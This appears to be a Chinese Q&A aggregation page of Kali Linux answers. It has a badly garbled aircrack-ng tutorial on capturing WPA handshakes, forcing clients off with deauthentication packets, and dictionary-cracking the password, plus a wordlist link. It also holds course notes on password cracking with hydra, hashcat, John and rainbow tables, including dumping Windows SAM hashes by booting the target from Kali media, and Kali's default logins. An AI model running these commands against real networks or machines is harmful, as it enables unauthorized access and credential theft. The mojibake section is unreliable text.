kaliftp密碼爆破
Ⅰ 涓撶牬鍔犲瘑wifi鐨勮蔣浠 Kali浣跨敤Aircrack-ng榪涜屾毚鍔涚牬瑙WIFI瀵嗙爜
鍓嶈█
涓銆佷粈涔堟槸Aircrack-ng
Aircrack-ng鏄涓涓涓802.11鏍囧噯鐨勬棤綰跨綉緇滃垎鏋愭湁鍏崇殑瀹夊叏杞浠訛紝涓昏佸姛鑳芥湁錛氱綉緇滀睛嫻嬶紝鏁版嵁鍖呭棶鎺錛學EP鍜學PA/WPA2-PSK鐮磋В銆侫ircrack-ng鍙浠ュ伐浣滃湪浠諱綍鏀鎸佺洃鍚妯″紡鐨勬棤綰跨綉鍗′笂錛堣懼囧垪琛ㄨ峰弬闃呭叾瀹樻柟緗戠珯錛夊苟鍡呮帰802.11a錛802.11b錛802.11g鐨勬暟鎹銆傝ョ▼搴忓彲榪愯屽湪linux鍜學indows涓娿侺inux鐗堟湰宸茬粡琚縐繪嶅埌浜哯aurus鍜孧aemo緋葷粺騫沖彴,騫舵傚康楠岃瘉鍙縐繪嶅埌iPhone銆
榪愯岀幆澧
浣跨敤Kali2021.3榪涜屾紨紺烘搷浣
杞浠訛細aircrack-ng錛圞ali緋葷粺鍐呯疆錛
澶栫疆鏃犵嚎緗戝崱璁懼囷細瑕佹敮鎸佺洃鍚錛屾敮鎸丩inux騫朵笖鍏嶉┍錛堟垜榪欓噷浣跨敤鐨勬槸RT3070錛
鎻掑叆緗戝崱璁懼
榪涘叆Kali緋葷粺涔嬪悗鎻掑叆鑷宸辯殑緗戝崱鍙抽敭鏌ョ湅緗戝崱鏄鍚﹁繛鎺ュ埌Kali
浜屻佺牬瑙f祦紼
1.榪涘叆綆$悊鍛樻ā寮
鍛戒護錛sudosu
瑙i噴錛涓嶅湪綆$悊鍛樻ā寮忎笅榪愯屽彲鑳戒細鏈夋潈闄愪笉澶熺殑鎻愮ず
鎻愮ず錛氭墽琛屽懡浠や箣鍚庤緭鍏Kali鐨勫瘑鐮侊紝瀵嗙爜鏄琚闅愯棌鐨勶紝鐩存帴杈撳叆鐒跺悗鍥炶濺鍗沖彲
2.鏌ョ湅緗戝崱淇℃伅
鍛戒護錛
iwconfig/ifconfig
瑙i噴錛
iwconfig鏌ョ湅緗戝崱鐨勪俊鎮銆乮fconfig鏌ョ湅鏂拌繛鎺ョ殑璁懼
wlan0灝辨槸鎴戜滑鐨勬棤綰跨綉鍗
3.鏉鎺夊啿紿佽繘紼
鍛戒護錛
airmon-ngcheckkill
瑙i噴錛
鏉姝昏繘紼嬪彲浠ヨ╂悳緔㈡洿鍑嗙『錛屼笉浼氬彈鍒板獎鍝
4.鏌ョ湅緗戝崱鏄鍚︽敮鎸佺洃鍚妯″紡
鍛戒護錛
airmon-ng
鍑虹幇浣犵殑緗戝崱淇℃伅灝辮存槑浣犵殑緗戝崱鏀鎸佺洃鍚
5.寮鍚鏃犵嚎緗戝崱鐩戝惉妯″紡
鍛戒護錛
airmon-ngstartwlan0
瑙i噴錛
start寮鍚鍝涓鎺ュ彛wlan0鏄鎺ュ彛鐨勫悕瀛
鍐嶇敤iwconfig鏌ョ湅涓涓嬬綉鍗′俊鎮錛寃lan0鍚庨潰澶氫簡涓猰on錛寃lan0mon灝辮存槑宸茬粡寮鍚鐩戝惉浜
5.鑾峰彇闄勮繎鐨凙P淇℃伅錛堟悳WIFI錛
鍛戒護錛
airomp-ngwlan0mon
瑙i噴錛
BSSID錛歐IFI鐨凪AC鍦板潃銆丳WR錛氫俊鍙峰己搴︼紙鍊艱秺灝忎俊鍙峰己搴﹀己錛夈丏ata錛氱洃鍚鏈熼棿嫻侀噺鎬誨悎銆丆H錛氫俊閬撱丒NC錛氬姞瀵嗙畻娉曘丒SSID錛歐IFI鍚嶇О
鎻愮ず錛氭壘鍒扮綉緇滀箣鍚嶤TRL+Z緇撴潫鎼滅儲灝卞彲浠
6.寮濮嬫姄鍙栨彙鎵嬪寘騫朵繚瀛樻垚鏂囦歡
鍛戒護錛
airomp-ng-c(棰戦亾鍙)--bssid(MAC鍦板潃)-w(鎶撳彇鐨勬暟鎹鍖呯殑淇濆瓨浣嶇疆)wlan0mon
瑙i噴錛
1.c:淇¢亾
2.bssid:BSSID鍊
3.w:鎹曡幏鐨勬彙鎵嬪寘瑕佷繚瀛樺埌鐨勮礬寰
鎴戣佺牬瑙g殑鐩鏍囩綉緇滄槸Test錛孋H錛堜俊閬擄級鏄11錛孧AC鍦板潃鏄疎2:D4:64:02:73:A8錛屾垜鍦ㄦ牴鐩褰曚笅鍒涘緩浜嗕竴涓鍚嶄負1鐨勬枃浠跺す
杈撳叆鍛戒護錛
airomp-ng-c11--bssidE2:D4:64:02:73:A8-w1/wlan0mon
鎻愮ず錛氭墍鏈夌殑鏁板奸兘瑕佸啓鍒氬垰鏌ュ埌瑕佺牬瑙g殑WIFI鍏朵腑涓涓瀹㈡埛絝鐨勫
(1)絳夊緟鏂扮殑璁懼囪繛鎺WIFI
褰撴柊鐨勫㈡埛絝榪炴帴鏃訛紝瀹㈡埛絝杈撳叆瀵嗙爜榪炴帴灝卞彲浠ユ姄鍒版彙鎵嬪寘錛屽彸涓婅掑嚭鐜癢PA鏃跺氨琛ㄧず宸茬粡鎶撳埌浜嗗規柟鐨勬彙鎵嬪寘
(2)涓誨姩鏀誨嚮
鍛戒護錛
aireplay-ng-o2-aBSSID錛圡AC鍦板潃錛-cSTATIONwlan0mon
瑙i噴錛
0錛氬瑰㈡埛絝琛ㄧず鍙戣搗鏀誨嚮錛岃╄懼囨柇寮榪炴帴
2錛氳〃紺烘敾鍑繪℃暟錛0琛ㄧず涓鐩存敾鍑
a錛氭寚瀹氭棤綰胯礬鐢卞櫒BSSID
c錛氭寚瀹氬己鍒舵柇寮鐨勮懼嘙AC
鎵ц屽懡浠aireplay-ng-o2-aE2:D4:64:02:73:A8-cC8:94:02:6D:93:F3wlan0mon
鎹曟崏鍒版彙鎵嬪寘鏃跺氨鍋滄㈡敾鍑
娉ㄦ剰錛氭墽琛屼富鍔ㄦ敾鍑葷殑鏃跺欐柊寤轟竴涓緇堢鎵ц屽懡浠わ紝鍘熸潵鐨勬姄鍖呯粓絝涓嶈佺粨鏉
6.鐮磋В鎻℃墜鍖呭瘑鐮
鍛戒護錛
aircrack-ng-a2-bE2:D4:64:02:73:A8-w瀛楀吀.txt1/-01.cap
瑙i噴錛
a2:WPA鐨勬彙鎵嬪寘
b:鐮磋В鐨刉IFI鐨凚SSID
w:鎸囧畾瀛楀吀鏂囦歡
*:.cap鏄鎶撳彇鍒版彙鎵嬪寘鐨勬暟鎹鍖呮枃浠
鏈鍚庡氨鏄絳夊緟璺戝瓧鍏鎬簡錛屼笅闈㈠氨鏄鐮磋В鐨刉IFI瀵嗙爜錛屽瘑鐮佹槸20041101
7.鍏抽棴鐩戝惉妯″紡
鍛戒護錛
airmon-ngstopwlan0mon
鍦ㄧ洃鍚妯″紡涓嬶紝kali涓嶈兘榪炴帴緗戠粶
涓夈佹葷粨
1.闂棰
鎻掑叆緗戝崱錛屽傛灉鏌ョ湅涓嶅埌緗戝崱淇℃伅錛屽彲浠ョ偣寮榪炴帴WIFI鐪嬩竴涓嬭兘鍚︽悳緔㈠埌闄勮繎鐨勭綉緇滐紝濡傛灉涓嶈岄偅灝卞彸閿緋葷粺鍙縐誨姩璁懼-鎶婄綉鍗℃柇寮鍐嶉噸鏂拌繛鎺ヤ竴涓
2.瀵嗙爜瀛楀吀
鎻掑叆緗戝崱錛屾墦寮緗戝崱鐨勭洃鍚妯″紡錛屾悳緔㈤檮榪戠殑WIFI錛岃幏鍙栨彙鎵嬪寘錛屾渶鍚庤窇瀛楀吀鐮磋В鎻℃墜鍖咃紝榪欓噷緇欏ぇ瀹舵彁渚涗竴涓甯哥敤鐨勫瘑鐮佸瓧鍏
閾炬帴:
https://pan..com/s/1NSNniAvaLdcY0HALbBnUTw?pwd=
鎻愬彇鐮:gg7y
Ⅱ kali linux 可以做什麼
kali Linux官方的說法是滲透測試,大致分為Web滲透(針對網站)、無線滲透(測試WIFI的安全性,安全性低的wifi滲透後可以得到wifi密碼,進而進行ARP欺騙、嗅探、會話劫持)、主機滲透(就是根據主機漏洞進行滲透,主要用nessus和Metasploit)。此外還可以進行密碼破解,一般都是字典爆破(破passwd哈希、MD5、rar密碼、各種口令)。還有社工工具(比較著名的是SET)和信息收集工具也很多。
Ⅲ 網路安全乾貨知識分享 - Kali Linux滲透測試 106 離線密碼破解
前言
最近整理了一些 奇安信&華為大佬 的課件資料+大廠面試課題,想要的可以私信自取, 無償贈送 給粉絲朋友~
1. 密碼破解簡介
1. 思路
目標系統實施了強安全措施
安裝了所有補丁
無任何已知漏洞
無應用層漏洞
攻擊面最小化
社會 工程學
獲取目標系統用戶身份
非授權用戶不受信,認證用戶可以訪問守信資源
已知用戶賬號許可權首先,需要提權
不會觸發系統報警
2. 身份認證方法
證明你是你聲稱你是的那個人
你知道什麼(賬號密碼、pin、passphrase)
你有什麼(令牌、token、key、證書、密寶、手機)
你是誰(指紋、視網膜、虹膜、掌紋、聲紋、面部識別)
以上方法結合使用
基於互聯網的身份驗證仍以賬號密碼為主要形式
3. 密碼破解方法
人工猜解
垃圾桶工具
被動信息收集
基於字典暴力破解(主流)
鍵盤空間字元爆破
字典
保存有用戶名和密碼的文本文件
/usr/share/wordlist
/usr/share/wfuzz/wordlist
/usr/share/seclists
4. 字典
1. 簡介
鍵盤空間字元爆破
全鍵盤空間字元
部分鍵盤空間字元(基於規則)
數字、小寫字母、大寫字元、符號、空格、瑞典字元、高位 ASCII 碼
2. crunch 創建密碼字典
無重復字元
crunch 1 1 -p 1234567890 | more
1
必須是最後一個參數
最大、最小字元長度失效,但必須存在
與 -s 參數不兼容(-s 指定起始字元串)
crunch 4 4 0123456789 -s 9990
讀取文件中每行內容作為基本字元生成字典
crunch 1 1 -q read.txt
1
字典組成規則
crunch 6 6 -t @,%%^^ | more
-t:按位進行生成密碼字典
@:小寫字母 lalpha
,:大寫字母 ualpha
%:數字 numeric
^:符號 symbols
輸出文件壓縮
root@kali:~# crunch 4 5 -p dog cat bird
1
-z:指定壓縮格式
其他壓縮格式:gzip、bzip2、lzma
7z壓縮比率最大
指定字元集
root@kali:~# crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha-numeric-all-space -o w.txt -t @d@@ -s cdab
1
隨機組合
root@kali:~# crunch 4 5 -p dog cat bird
1
crunch 5 5 abc DEF + !@# -t ,@^%,
在小寫字元中使用abc范圍,大寫字元使用 DEF 范圍,數字使用佔位符,符號使用!@#
佔位符
轉義符(空格、符號)
佔位符
root@kali:~# crunch 5 5 -t ddd%% -p dog cat bird
1
任何不同於 -p 參數指定的值都是佔位符
指定特例
root@kali:~# crunch 5 5 -d 2@ -t @@@%%
1
2@:不超過兩個連續相同字元
組合應用
crunch 2 4 0123456789 | aircrack-ng a.cap -e MyESSID -w -
crunch 10 10 12345 –stdout | airolib-ng testdb -import passwd -
3. CUPP 按個人信息生成其專屬的密碼字典
CUPP:Common User Password Profiler
git clone https://github.com/Mebus/cupp.git
python cupp.py -i
4. cewl 通過收集網站信息生成字典
cewl 1.1.1.1 -m 3 -d 3 -e -c -v -w a.txt
-m:最小單詞長度
-d:爬網深度
-e:收集包含email地址信息
-c:每個單詞出現次數
支持基本、摘要 身份認證
支持代理
5. 用戶密碼變型
基於 cewl 的結果進行密碼變型
末尾增加數字串
字母大小寫變化
字母與符號互相轉換
字母與數字互相轉換
P@$w0rd
6. 使用 John the Ripper 配置文件實現密碼動態變型
2. 在線密碼破解
1. hydra
簡介
密碼破解
Windows 密碼破解
Linux 密碼破解
其他服務密碼破解
圖形化界面
xhydra
HTTP表單身份認證
密碼破解效率
密碼復雜度(字典命中率)
帶寬、協議、伺服器性能、客戶端性能
鎖定閾值
單位時間最大登陸請求次數
Hydra 的缺點
穩定性差,程序時常崩潰
速度控制不好,容易觸發服務屏蔽或鎖死機制
每主機新建進程,每服務新建實例
大量目標破解時性能差
2. pw-inspector
Hydra 小工具 pw-inspector
按長度和字元集篩選字典
pw-inspector -i /usr/share/wordlists/nmap.lst -o p1.lst -l
pw-inspector -i /usr/share/wordlists/nmap.lst -o P2.lst -u
pw-inspector -i /usr/share/wordlists/nmap.lst -o P2.lst -u -m 3 -M 5
3. mesa
Mesa 的特點
穩定性好
速度控製得當
基於線程
支持模塊少於hydra(不支持RDP)
WEB-Form 支持存在缺陷
查看支持的模塊
參數
-n:非默認埠
-s:使用SSL連接
-T:並發主機數
mesa -M ftp -q
3. 離線密碼破解
1. 簡介
身份認證
禁止明文傳輸密碼
每次認證使用HASH演算法加密密碼傳輸(HASH演算法加密容易、解密困難)
伺服器端用戶資料庫應加鹽加密保存
破解思路
嗅探獲取密碼HASH
利用漏洞登陸伺服器並從用戶資料庫獲取密碼HASH
識別HASH類型
長度、字元集
利用離線破解工具碰撞密碼HASH
優勢
離線不會觸發密碼鎖定機制
不會產生大量登陸失敗日誌引起管理員注意
2. HASH 識別工具
1. hash-identifier
進行 hash 計算
結果:
進行 hash 識別
2. hashid
可能識別錯誤或無法識別
3. HASH 密碼獲取
1. sammp2
Windows HASH 獲取工具
利用漏洞:Pwmp、fgmp、 mimikatz、wce
物理接觸:sammp2
將待攻擊主機關機
使用 Kali ISO 在線啟動此主機
發現此 windows 機器安裝有兩塊硬碟
mount /dev/sda1 /mnt
將硬碟掛載
cd /mnt/Windows/System32/config
切換目錄
sammp2 SYSTEM SAM -o sam.hash
導出密碼
利用 nc 傳輸 HASH
HASH 值:
2. syskey 工具進行密碼加密
使用 syskey 進行加密(會對 SAM 資料庫進行加密)
重啟需要輸入密碼才能進一步登錄
使用 kali iso live
獲取到 hash 值
hashcat 很難破解
使用 bkhive 破解
使用 Bootkey 利用RC4演算法加密 SAM 資料庫
Bootkey 保存於 SYSTEM 文件中
bkhive
從 SYSTEM 文件中提取 bootkey
Kali 2.0 拋棄了 bkhive
編譯安裝 :http://http.us.debian.org/debian/pool/main/b/bkhive/
在windows的 kali live 模式下,運行
sammp2 SAM key (版本已更新,不再支持此功能)
建議使用 Kali 1.x
1. Hashcat
簡介
開源多線程密碼破解工具
支持80多種加密演算法破解
基於CPU的計算能力破解
六種模式 (-a 0)
0 Straight:字典破解
1 Combination:將字典中密碼進行組合(1 2 > 11 22 12 21)
2 Toggle case:嘗試字典中所有密碼的大小寫字母組合
3 Brute force:指定字元集(或全部字元集)所有組合
4 Permutation:字典中密碼的全部字元置換組合(12 21)
5 Table-lookup:程序為字典中所有密碼自動生成掩碼
命令
hashcat -b
hashcat -m 100 hash.txt pass.lst
hashcat -m 0 hash.txt -a 3 ?l?l?l?l?l?l?l?l?d?d
結果:hashcat.pot
hashcat -m 100 -a 3 hash -i –increment-min 6 –increment-max 8 ?l?l?l?l?l?l?l?l
掩碼動態生成字典
使用
生成文件
計算 hash 類型
結果 MD5
查看 MD5 代表的值
進行破解
2. oclhashcat
簡介
號稱世界上最快、唯一的基於GPGPU的密碼破解軟體
免費開源、支持多平台、支持分布式、150+hash演算法
硬體支持
虛擬機中無法使用
支持 CUDA 技術的Nvidia顯卡
支持 OpenCL 技術的AMD顯卡
安裝相應的驅動
限制
最大密碼長度 55 字元
使用Unicode的最大密碼長度 27 字元
關於版本
oclHashcat-plus、oclHashcat-lite 已經合並為 oclhashcat
命令
3. RainbowCrack
簡介
基於時間記憶權衡技術生成彩虹表
提前計算密碼的HASH值,通過比對HASH值破解密碼
計算HASH的速度很慢,修改版支持CUDA GPU
https://www.freerainbowtables.com/en/download/
彩虹表
密碼明文、HASH值、HASH演算法、字元集、明文長度范圍
KALI 中包含的 RainbowCrack 工具
rtgen:預計算,生成彩虹表,時的階段
rtsort:對 rtgen 生成的彩虹錶行排序
rcrack:查找彩虹表破解密碼
以上命令必須順序使用
rtgen
LanMan、NTLM、MD2、MD4、MD5、SHA1、SHA256、RIPEMD160
rtgen md5 loweralpha 1 5 0 10000 10000 0
計算彩虹表時間可能很長
下載彩虹表
http://www.freerainbowtables.com/en/tables/
http://rainbowtables.shmoo.com/
彩虹表排序
/usr/share/rainbowcrack
rtsort /md5_loweralpha#1-5_0_1000x1000_0.rt
密碼破解
r crack *.rt -h
rcrack *.rt -l hash.txt
4. John
簡介
基於 CPU
支持眾多服務應用的加密破解
支持某些對稱加密演算法破解
模式
Wordlist:基於規則的字典破解
Single crack:默認被首先執行,使用Login/GECOS信息嘗試破解
Incremental:所有或指定字元集的暴力破解
External:需要在主配配文件中用C語言子集編程
默認破解模式
Single、wordlist、incremental
主配置文件中指定默認wordlist
破解Linux系統賬號密碼
破解windows密碼
Johnny 圖形化界面的john
5. ophcrack
簡介
基於彩虹表的LM、NTLM密碼破解軟體
彩虹表:http://ophcrack.sourceforge.net/tables.php
Ⅳ 請問kali的初始密碼是多少呢
筆者這里使用的是2020之前的版本,默認的賬號密碼是
賬號:root
密碼:toor
2但是在2020之後的版本當中改變安全策略,賬號密碼轉變為
賬號:kali
密碼:kali
3最後再說一下特殊情況
如果在安裝kali的時候就已經設置了密碼,那麼默認的賬號密碼就是
賬號:root
密碼:安裝時候kali系統的時候的密碼